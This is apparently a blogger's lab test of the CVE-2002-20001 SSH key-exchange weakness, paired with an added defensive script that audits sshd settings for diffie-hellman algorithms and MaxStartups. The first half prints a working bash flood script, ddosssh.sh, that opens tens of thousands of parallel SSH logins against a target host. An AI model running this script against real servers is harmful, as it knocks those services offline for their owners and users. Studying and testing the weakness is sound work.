This test was created when I worked with the CVE-2002-20001 vulnerability. The vulnerability concerns the diffie-hellman-group-exchange-sha256 key exchange algorithm, whose high computational complexity comes from long exponents that arguably make certain calculations unnecessarily expensive. To test the issue I created a small bash script, ddosssh.sh, to simulate a DDoS attack on an ssh server using different key exchange algorithms. The script code is:
#!/bin/bash
if [ $# -ne 2 ]; then
    echo "No arguments: server ID/FQDN and kex algorithm"
    exit
fi
for i in {0..70000}
do
    sshpass -p 12345 ssh -o KexAlgorithms=$2 admin@$1 &
done
To run the script you need to install sshpass; for CentOS:
yum install sshpass
Then I started ddosssh.sh with the diffie-hellman-group-exchange-sha256 key exchange algorithm:
./ddosssh.sh 192.168.2.40 diffie-hellman-group-exchange-sha256
An attempt to log in via ssh to the same server shows me this:
# ssh root@192.168.2.40
ssh_exchange_identification: Connection closed by remote host
However, attempts with other Kex algorithms do not show significant differences; sometimes login was denied as well. However, when I ran the script from different computers, in other words doing a DDoS attack instead of DoS, the ssh server on the target machine always falls into an unusable state.
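For the server side of this test, the following added example (not part of the original post) audits an sshd effective configuration, in the format printed by `sshd -T`, for enabled diffie-hellman-* key exchange algorithms and for the MaxStartups limit on concurrent unauthenticated connections. The sample configuration is constructed, the function names are hypothetical, and treating removal of the diffie-hellman-* entries as the candidate setting is an assumption about how a site chooses to respond.

```shell
#!/bin/bash
# Constructed sample in `sshd -T` output format (lowercase keyword, then value).
SAMPLE_CONFIG='port 22
maxstartups 10:30:100
kexalgorithms curve25519-sha256,ecdh-sha2-nistp256,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256'

# Print each enabled diffie-hellman-* kex algorithm, one per line (config on stdin).
dh_kex_enabled() {
    awk '$1 == "kexalgorithms" {
        n = split($2, a, ",")
        for (i = 1; i <= n; i++) if (a[i] ~ /^diffie-hellman-/) print a[i]
    }'
}

# Print the kexalgorithms list with the diffie-hellman-* entries removed.
kex_without_dh() {
    awk '$1 == "kexalgorithms" {
        n = split($2, a, ","); out = ""
        for (i = 1; i <= n; i++)
            if (a[i] !~ /^diffie-hellman-/) out = out (out == "" ? "" : ",") a[i]
        print out
    }'
}

# Print the MaxStartups value (start:rate:full).
max_startups() {
    awk '$1 == "maxstartups" { print $2 }'
}

# Read a configuration on stdin and print a short report.
audit_sshd() {
    cfg=$(cat)
    dh=$(printf '%s\n' "$cfg" | dh_kex_enabled)
    echo "MaxStartups: $(printf '%s\n' "$cfg" | max_startups)"
    if [ -n "$dh" ]; then
        echo "diffie-hellman-* key exchange enabled:"
        printf '  %s\n' $dh
        echo "Candidate setting: KexAlgorithms $(printf '%s\n' "$cfg" | kex_without_dh)"
    else
        echo "No diffie-hellman-* key exchange enabled"
    fi
}

# Demo on the constructed sample; on a real host, as root: sshd -T | audit_sshd
printf '%s\n' "$SAMPLE_CONFIG" | audit_sshd
```

When sshd refuses new unauthenticated connections because the MaxStartups limit is reached, a client can see the connection closed before the identification exchange regardless of which key exchange algorithm it requested.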